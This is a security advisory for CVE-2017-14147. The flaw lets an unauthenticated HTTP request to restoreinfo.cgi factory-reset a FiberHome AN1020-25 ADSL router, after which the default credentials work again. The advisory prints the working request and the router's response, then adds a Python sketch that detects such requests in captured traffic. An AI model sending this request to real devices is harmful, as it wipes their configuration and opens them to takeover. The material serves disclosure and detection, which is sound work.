Title:
====

FiberHome Unauthenticated ADSL Router Factory Reset.

Credit:
======

Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io

CVE:
=====

CVE-2017-14147

Date:
====

05-09-2017 (dd/mm/yyyy)

About FiberHome:
======

FiberHome Technologies is a leading equipment vendor and global solution provider in the field of information technology and telecommunications. FiberHome deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, optic preforms, fiber & cables, and optical communication systems to many countries around the world.

Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices

URL : http://www.fiberhomegroup.com/

Description:
=======

This vulnerability in the AN1020-25 router enables an anonymous, unauthorized attacker to bypass authentication and reach the function that resets the router to factory settings, resulting in an unauthorized reset to the factory state. The attacker can then log in to the router's main page with the default username & password.

Affected Device Model:
=============

FiberHome ADSL AN1020-25

Exploitation-Technique:
===================

Remote

Details:
=======

The vulnerability listed below enables an anonymous, unauthorized attacker to reset the router to its factory settings and then access the router admin page with default credentials.

1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147

Vulnerable restoreinfo.cgi

Proof Of Concept:
================

PoC :

GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close


HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide

function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';

if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}

eval(code);
}

function frmLoad() {
setTimeout("restore()", 60000);
}

// done hiding -->
</script>
</head>

<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>

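Detection sketch for the exchange above, added here as an example and not part of the original advisory: it classifies captured HTTP request/response pairs (for instance from a LAN-side proxy or packet capture) that touch restoreinfo.cgi. The function names, the result labels and the rule that an admin session carries an Authorization or Cookie header are assumptions of this example.

```python
import re
from urllib.parse import unquote, urlsplit

RESET_PATH = "/restoreinfo.cgi"      # endpoint named in the advisory
RESET_MARKER = "DSL Router Restore"  # banner in the PoC response body

def parse_http(raw):
    """Split a raw HTTP message into (start line, lowercased headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip().split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify(raw_request, raw_response=""):
    """Return None, 'authenticated-reset', 'reset-attempt' or 'reset-confirmed'."""
    start, req_headers, _ = parse_http(raw_request)
    m = re.match(r"\S+\s+(\S+)\s+HTTP/\d\.\d$", start)
    if not m:
        return None
    # Normalise the target: drop scheme/host/query, decode %xx, ignore case.
    path = unquote(urlsplit(m.group(1)).path).lower()
    if not path.endswith(RESET_PATH):
        return None
    # Assumption (not from the advisory): a logged-in admin request carries
    # an Authorization or Cookie header; the PoC request has neither.
    if "authorization" in req_headers or "cookie" in req_headers:
        return "authenticated-reset"
    if raw_response:
        status, _, body = parse_http(raw_response)
        if re.match(r"HTTP/\d\.\d\s+200\b", status) and RESET_MARKER in body:
            return "reset-confirmed"
    return "reset-attempt"

# Abridged from the advisory's PoC exchange (most headers and markup trimmed).
POC_REQUEST = "GET /restoreinfo.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"
POC_RESPONSE = ("HTTP/1.1 200 Ok\r\nServer: micro_httpd\r\n\r\n"
                "<html><body><b>DSL Router Restore</b></body></html>")
# Constructed for comparison: an ordinary page load and a credentialed reset.
BENIGN_REQUEST = "GET /main.html HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"
AUTHED_REQUEST = ("GET /restoreinfo.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
                  "Authorization: Basic PLACEHOLDER\r\n\r\n")

if __name__ == "__main__":
    for req, resp in [(POC_REQUEST, POC_RESPONSE), (POC_REQUEST, ""),
                      (AUTHED_REQUEST, ""), (BENIGN_REQUEST, "")]:
        print(classify(req, resp))
```

A "reset-confirmed" result means the device answered with the restore banner, so the default credentials are back in force until the router is reconfigured.
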
Credits:
=======

Ibad Shah, Taimooor Zafar, Owais Mehtab